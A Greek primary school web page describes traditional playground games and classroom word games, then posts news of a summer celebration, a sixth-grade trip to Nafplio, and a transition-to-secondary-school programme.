Χαλασμένο τηλέφωνο
Τα παιδιά κάθονται σε σειρά ή σε κύκλο. Το πρώτο παιδί λέει γρήγορα στο αυτί του διπλανού του μια δύσκολη λέξη. Ο δεύτερος την λέει στο αυτί του επόμενου κλπ. Ο τελευταίος λέει τη λέξη δυνατά κι αν την πει σωστά τότε ο πρώτος κερδίζει.

Αλάτι χονδρό-αλάτι ψιλό
Στην αρχή τα παιδιά κάνουν κλήρωση για να βγάλουν τη μάνα. Ύστερα κάθονται οκλαδόν σε κύκλο με τα χέρια πίσω. Η μάνα είναι έξω από τον κύκλο και κρατά ένα μαντίλι. Γυρίζει γύρω από τον κύκλο τραγουδώντας:
Αλάτι ψιλό, αλάτι χονδρό,
έχασα τη μάνα μου και πάω να τη βρω
παπούτσια δεν μου πήρε να πάω στο χορό.
Όσο τραγουδάει αφήνει πίσω από ένα παιδί το μαντίλι. Τότε αυτό σηκώνεται κι αρχίζει να κυνηγάει τη μάνα. Όταν την πιάσει, η μάνα κάθεται στη θέση του και αυτό το παιδί παίρνει τη θέση της και γίνεται μάνα.

Ο Βασιλιάς
Αφού τα βγάλουν τα παιδιά, ένα γίνεται βασιλιάς. Τα άλλα πηγαίνουν λίγο πιο πέρα και διαλέγουν κάποιο επάγγελμα για να το παραστήσουν με κινήσεις. Έπειτα πλησιάζουν το βασιλιά και ακολουθεί ο παρακάτω διάλογος:
– Βασιλιά, βασιλιά με τα 12 σπαθιά, τι δουλειά;
– Τεμπελιά!
– Και τα ρέστα;
– Παγωτά.
– Είπε η γιαγιά να μας κάνεις μια δουλειά.
– Τι δουλειά;
Τότε τα παιδιά μιμούνται το επάγγελμα που διάλεξαν. Αν ο βασιλιάς το καταλάβει, το λέει και κυνηγά να πιάσει κάποιο παιδί που γίνεται βασιλιάς στον επόμενο γύρω. Αν δεν το καταλάβει, τα παιδιά μιμούνται κάποιο άλλο επάγγελμα.

Κλέφτες και αστυνόμοι
Τα παιδιά χωρίζονται σε δύο ομάδες. Η μικρότερη ομάδα είναι οι αστυνόμοι και η άλλη ομάδα είναι οι κλέφτες. Τα παιδιά ξεκινούν το κυνηγητό. Αν οι κλέφτες θέλουν να ξεκουραστούν πηγαίνουν σε ένα συγκεκριμένο σημείο κι εκεί οι αστυνόμοι δεν μπορούν να τους πιάσουν. Όταν ένας αστυνόμος πιάσει έναν κλέφτη τον οδηγεί στη φυλακή. Ο φυλακισμένος κλέφτης ελευθερώνεται αν τον ακουμπήσει άλλος κλέφτης και φωνάξει «ξελέ». Το παιχνίδι τελειώνει, όταν φυλακιστούν όλοι οι κλέφτες.

Η κολοκυθιά
Κάθε παιδί έχει έναν αριθμό 1, 2, 3, ? Το παιδί που έχει το 1 αρχίζει λέγοντας: «Στου παππού το περιβόλι, που το αγαπούμε όλοι, είναι μια κολοκυθιά, πλάι-πλάι στη ροδιά. Κάνει πέντε κολοκύθια στρογγυλά, μα την αλήθεια θα τα δώσει ο παππούς μποναμά της αλεπούς. Δυο θα δέσει στην ουρά της κι όλα τα άλλα στα παιδιά της». Μετά ρωτάει: «Ποιος θα πάει στην αλεπού; Να πάει ο αριθμός ?» Το παιδί που έχει εκείνο τον αριθμό λέει: «Γιατί να πάει το ???; Να πάει το ?..», προτείνοντας κάποιον άλλο αριθμό. Αν κάποιο παιδί απαντήσει χωρίς να είναι ο αριθμός του, χάνει και μιμείται κάποιο ζώο που έχει ορίσει η ομάδα.

Η κρεμάλα
Παίζεται με δύο ή περισσότερους παίκτες. Παίρνουμε μια σελίδα από χαρτί και γράφουμε τα γράμματα της αλφαβήτας. Στο πάνω μέρος ζωγραφίζουμε μια κρεμάλα και στο κάτω μέρος γράφουμε τη λέξη βάζοντας μόνο το πρώτο και το τελευταίο γράμμα της, ενώ για τα άλλα γράμματα βάζουμε παύλες. Ο αντίπαλος λέει ένα γράμμα. Αν το γράμμα ανήκει στη λέξη το γράφουμε πάνω στις παύλες, αλλιώς το διαγράφουμε από την αλφαβήτα και ζωγραφίζουμε ένα κεφάλι στην κρεμάλα. Το παιχνίδι συνεχίζεται μέχρι ο αντίπαλος να βρει τη λέξη. Αν ζωγραφίσουμε όλα τα σημεία του σώματος και ο αντίπαλος δεν έχει βρει τη λέξη, χάνει και καίγεται.

Το μαντιλάκι
Με μια κιμωλία σχεδιάζουμε έναν κύκλο στη μέση και δύο γραμμές, μία δεξιά και μία αριστερά. Τα παιδιά χωρίζονται σε δύο ομάδες. Κάθε παιδί από τις δύο ομάδες έχει έναν αριθμό. Βάζουν το μαντίλι στο κέντρο του κύκλου και τα παιδιά που έχουν τον ίδιο αριθμό προσπαθούν να πάρουν το μαντίλι χωρίς να τους πιάσει ο αντίπαλος. Αν πάρουν το μαντίλι, παίρνουν ένα πόντο. Αν τους πιάσει ο αντίπαλος, παίρνει αυτός τον πόντο. Νικήτρια είναι η ομάδα που έχει τους περισσότερους πόντους.

Τα μήλα
Δύο παίκτες κάθονται στα τέρματα σε απόσταση περίπου 3-5 μέτρων μεταξύ τους και τα υπόλοιπα στο κέντρο. Τα παιδιά που είναι στα τέρματα ρίχνουν την μπάλα προσπαθώντας σαν πετύχουν κάποιο από τα παιδιά που είναι στο κέντρο. Αν το πετύχουν αυτό βγαίνει έξω. Αν κάποιο από τα παιδιά του κέντρου πιάσει την μπάλα χωρίς αυτή να έχει χτυπήσει προηγουμένως κάτω, έχει ένα μήλο δηλαδή μία επιπλέον ζωή. Τα παιδιά του κέντρου τρέχουν από το ένα άκρο στο άλλο για να μη χτυπηθούν από την μπάλα. Αν μείνει ένα παιδί στο κέντρο τότε θα χτυπηθούν 12 μπαλιές κι αν δεν το πετύχουν ξαναμπαίνουν όλοι οι παίκτες μέσα με τα ίδια τέρματα, ενώ αν το πετύχουν το παιχνίδι ξαναρχίζει με διαφορετικούς παίκτες στα τέρματα.

Ο λύκος και τ? αυγά
Ένα παιδί κάνει το λύκο, ένα άλλο τη μάνα και τα υπόλοιπα τα αυγά. Η μάνα περνάει από τα αυγά και κάθε αυγό της λέει σιγανά στο αυτί ένα χρώμα. Μετά η μάνα λέει στο λύκο ανακατεμένα τα χρώματα κι αυτός διαλέγει ένα χρώμα. Το παιδί που έχει αυτό το χρώμα βγαίνει από το χώρο που είναι συγκεντρωμένα τα αυγά και ο λύκος αρχίζει να το κυνηγά. Αν το πιάσει, το βάζει στη φυλακή. Η μάνα λέει ξανά τα χρώματα, ο λύκος διαλέγει ένα και το παιχνίδι συνεχίζεται. Αν ο λύκος στο τέλος πιάσει όλα τα αυγά, κερδίζει εκείνος, αλλιώς χάνει.

Αλλαγές
Τα παιδιά αφήνουν στο χώρο ξυλαράκια. Γίνεται κλήρωση κι ένα παιδί βγαίνει έξω. Τα άλλα παιδιά κάθονται πάνω στα ξυλαράκια τους. Το παιδί που βγήκε φωνάζει «αλλαγή». Τότε τα παιδιά τρέχουν να σταθούν μπροστά σε διαφορετικό ξυλαράκι ενώ το παιδί που είναι έξω τα κυνηγά. Αν πιάσει κάποιο παιδί, παίρνει τη θέση του και το παιχνίδι συνεχίζεται.

Σχοινάκι
Δύο παιδιά γυρίζουν το σχοινάκι με σταθερό ρυθμό και τα άλλα πηδούν μέσα στο σχοινάκι. Όποιο παιδί μπερδευτεί χάνει και βγαίνει έξω.

Τα αγάλματα
Ένα παιδί γυρίζει στον τοίχο και λέει: «Αγαλματάκια ακούνητα, αμίλητα, αγέλαστα, μέρα ή νύχτα;» Τα άλλα παιδιά προσπαθούν να πάρουν τη στάση ενός αγάλματος κι αν είναι έτοιμα απαντούν «μέρα», αλλιώς απαντούν «νύχτα». Όταν το παιδί που τα φυλάει γυρίσει, τα άλλα παιδιά προσπαθούν να μείνουν εντελώς ακίνητα. Όποιο κουνηθεί, χάνει. Νικητής είναι αυτός που θα μείνει ακίνητος μέχρι το τέλος.

Τρόποι χωρισμού των ομάδων ? επιλογή της μάνας

  • Δύο παίκτες στέκονται ο ένας απέναντι από τον άλλο σε απόσταση κάποιων μέτρων. Ύστερα αρχίζουν να προχωρούν, βάζοντας το ένα πόδι μπροστά από το άλλο. Όταν πλησιάσουν εκείνος που θα πατήσει το πόδι του άλλου, παίζει πρώτος.
  • Τα παιδιά τα βγάζουν λέγοντας κάποιο ποιηματάκι πχ. Α μπε μπα μπλομ ?. ή έχω ένα αυτοκινητάκι ?.. ή άκατα μάκατα?.

ΕΠΙΤΡΑΠΕΖΙΑ ΠΑΙΧΝΙΔΙΑ
Δημιουργία παιχνιδιού «Βρίσκω τη λέξη»
Φτιάχνουμε κάρτες 10Χ5. Στην πίσω πλευρά γράφουμε μια λέξη και αποκάτω 4 λέξεις τις οποίες απαγορεύεται ο αναγνώστης να πει στους συμπαίκτες του όταν τους ζητά να βρουν την κρυμμένη λέξη. Φτιάχνουμε σε συνεργασία με τους μαθητές τους κανόνες του παιχνιδιού:
1. Οι ομάδες έχουν 1 λεπτό για να βρουν την κρυμμένη λέξη.
2. Ο αναγνώστης δεν μπορεί να βοηθήσει τους συμπαίκτες του με παντομίμα.
3. Δεν μπορεί να χρησιμοποιήσει τις απαγορευμένες λέξεις αλλά ούτε και λέξεις που ανήκουν στην ίδια οικογένεια λέξεων με τις απαγορευμένες.
4. Οι παίκτες μπορούν να πουν πολλές λέξεις μέχρι να βρουν την κρυμμένη.

Δημιουργία παιχνιδιού «Φτιάχνω τη λέξη»
Η κάθε ομάδα παίρνει 10 μικρά τετράγωνα μαγνητάκια που υπάρχουν στην τάξη και στη μία πλευρά τους έχουν κάποιο γράμμα της αλφαβήτας και με αυτά προσπαθεί να φτιάξει κάποια λέξη. Μπορεί να χρησιμοποιήσει όσα γράμματα θέλει. Όταν φτιάξει τη λέξη, τη βάζει στο μαγνητοπίνακα και παίρνει τόσα γράμματα όσα χρησιμοποίησε. Μετά συνεχίζει η επόμενη ομάδα. Για κάθε λέξη παίρνουν τόσους πόντους όσα και τα γράμματα της λέξης. Νικήτρια είναι η ομάδα που μάζεψε τους περισσότερους πόντους.

Καλοκαιρινή Σχολική Γιορτή 2013-2014 (Video)

Ολόκληρο το Video από το Νοτια Κυνουρία WEBTV
Η Σχολική Χρονιά … το ΣΤ1 … … το ΣΤ2 ….

Συνάντηση με την ιστορία μας (Παλαμήδι, εθνική πινακοθήκη)

Οι μαθητές της ΣΤ΄ τάξης του σχολείου μας, επισκέφθηκαν το Παλαμήδι και την Εθνική πινακοθήκη στο Ναύπλιο. Είδαν από κοντά τον ιστορικό αυτό χώρο, έμαθαν για την κατασκευή του, τη χρήση του και για το ιδιαίτερο στοιχείο που το χαρακτηρίζει και δεν είναι άλλο από τα 999 σκαλοπάτια. Είδαν επίσης τη φυλακή του Θ. Κολοκοτρώνη και κατανόησαν τα δεινά που επιφέρει σε μια χώρα, σε ένα έθνος το μίσος, η ιδιοτέλεια και τα συμφέροντα που μπορεί να προέρχονται και από δυνάμεις εκτός των συνόρων. Στη συνέχεια επισκέφθηκαν την εθνική πινακοθήκη όπου οι μαθητές μας είδαν αυθεντικούς πίνακες σχετικούς με την επανάσταση του 1821. Πραγματοποιήθηκε ένας εποικοδομητικός διάλογος ανάμεσα στους υπευθύνους της πινακοθήκης και τους μαθητές μας που σκοπό είχε την κατανόηση της σημαντικότητας του παρελθόντος για ένα έθνος, μία χώρα καθώς και της αντίληψης από την πλευρά των μαθητών ότι η ιστορία δεν είναι ένα μάθημα παπαγαλίας και ξερών γνώσεων αλλά ένα μάθημα γνώσης του εαυτού μας, των συμπολιτών μας και των προγόνων μας που αποτελούν το ζωντανό κύτταρο του χώρου που ονομάζεται ΕΛΛΆΔΑ.
Ο Δάσκαλος της ΣΤ΄ τάξης Ηλίας Βλάχος.

Μετάβαση από το Δημοτικό στο Γυμνάσιο

Η μετάβαση των μαθητών (Στ΄ τάξης) του δημοτικού στο γυμνάσιο ανοίγει μια νέα πόρτα στη ζωή τους, η οποία συνδέει την παιδικότητα με την εφηβεία και την ανεμελιά με την υπευθυνότητα και το άγχος της επιβίωσης, σε ένα νέο και με περισσότερες απαιτήσεις κοινωνικό περιβάλλον.
Από την αρχή του εκπαιδευτικού έτους, στόχος του σχολείου (διευθυντής, εκπαιδευτικοί, δάσκαλοι Στ΄ τάξης) είναι να διαμορφωθεί ένα πλαίσιο όπου θα διευκολύνει τη μετάβαση στων μαθητών στη δευτεροβάθμια εκπαίδευση. Ο τρόπος που πραγματοποιούνται τα μαθήματα, η αντιμετώπιση των παιδιών, οι απαιτήσεις από αυτά αλλά και η βαθμολογία στις γραπτές και προφορικές αξιολογήσεις γίνεται με γνώμονα τη σύνδεση των δύο βαθμίδων εκπαίδευσης.
Καθημερινά, διαμέσου της συζήτησης, της ανταλλαγής απόψεων και της επαφής με νέα γνωστικά αντικείμενα, τα οποία θα διδαχθούν την επόμενη χρονιά (π.χ οδύσσεια, εξισώσεις, δυνάμεις, η αλήθεια στη θρησκευτική πίστη, το περιβάλλον και οι ανθρώπινες σχέσεις) προωθείται η γνωστική και ψυχολογική ενδυνάμωση, των μαθητών μας προκειμένου να αντιμετωπίσουν με επιτυχία τις νέες προκλήσεις και να βγουν νικητές όλοι, και όχι μόνο το ποσοστό εκείνο που είναι γνωστικά έτοιμο να επιβιώσει.
Κύριος στόχος είναι να συνειδητοποιήσουν, ότι δεν πηγαίνουν σε ένα περιβάλλον όπου θα νιώθουν απομονωμένοι και αβοήθητοι αλλά θα μεταβούν σε ένα χώρο όπου οι εκπαιδευτικοί της δευτεροβάθμιας εκπαίδευσης θα τους προσφέρουν όλα εκείνα τα εφόδια ώστε να κατορθώσουν να τα κάνουν πλεονέκτημα και να ισχυροποιήσουν την προσωπικότητά τους προς όφελος τόσο των ιδίων όσο και του ευρύτερου κοινωνικού συνόλου.
Το Δημοτικό Σχολείο Λεωνιδίου συμμετέχοντας στο πρόγραμμα ?μετάβαση από το δημοτικό στο γυμνάσιο? οι μαθητές της ΣΤ΄τάξης του σχολείου μας επισκέφθηκαν (με τους δασκάλους Κα. Τσουκάτου Ειρήνη, κ. Βλάχος Ηλίας και με την παρουσία της συμβούλου της περιφέρειάς μας κα. Καρούτζου Γεωργία) το γυμνάσιο όπου αρχικά ξεναγήθηκαν από τη διευθύντρια του γυμνασίου κα. Πορφύρη Πολυξένη στους χώρους του κι εν συνεχεία παρακολούθησαν το μάθημα των αρχαίων ελληνικών και της οικιακής οικονομίας.
Πριν την πραγματοποίηση της επίσκεψης οι μαθητές προχώρησαν σε βιωματικές δραστηριότητες στο χώρο της τάξης, όπου εργαζόμενοι είτε ατομικά είτε ομαδικά κατάφεραν, με ευχάριστη διάθεση να αντιμετωπίσουν όλες τις δραστηριότητες.
Στη συνέχεια αναρτούνται εικόνες από όλα τα βήματα- ενότητες του προγράμματος, πριν και κατά τη διάρκεια της μετάβασης. Μετά το τέλος της επίσκεψης οι μαθητές μας έγραψαν τα συναισθήματα και τις απόψεις τους για το νέο χώρο αλλά και ανέλυσαν το πλάνο τους για μια δυναμική και ουσιαστική παρουσία στο γυμνάσιο.
Ο Δάσκαλος του ΣΤ1 Βλάχος Ηλίας

Πρόσκληση για την καλοκαιρινή γιορτή

Οι μαθητές και οι εκπαιδευτικοί του Δημοτικού Σχολείου Λεωνιδίου σας προσκαλούμε στην καλοκαιρινή γιορτή μας την Τετάρτη 11 Ιουνίου 2014 και ώρα 19:30.

Η Γιορτή θα μεταδοθεί ζωντανά από την ιστοσελίδα μας σε συνεργασία με το NotiaKynouria WEBTV – στην διεύθυνση http://dim-leonid.ark.sch.gr/?p=2310 και http://www.notiakynouriawebtv.gr .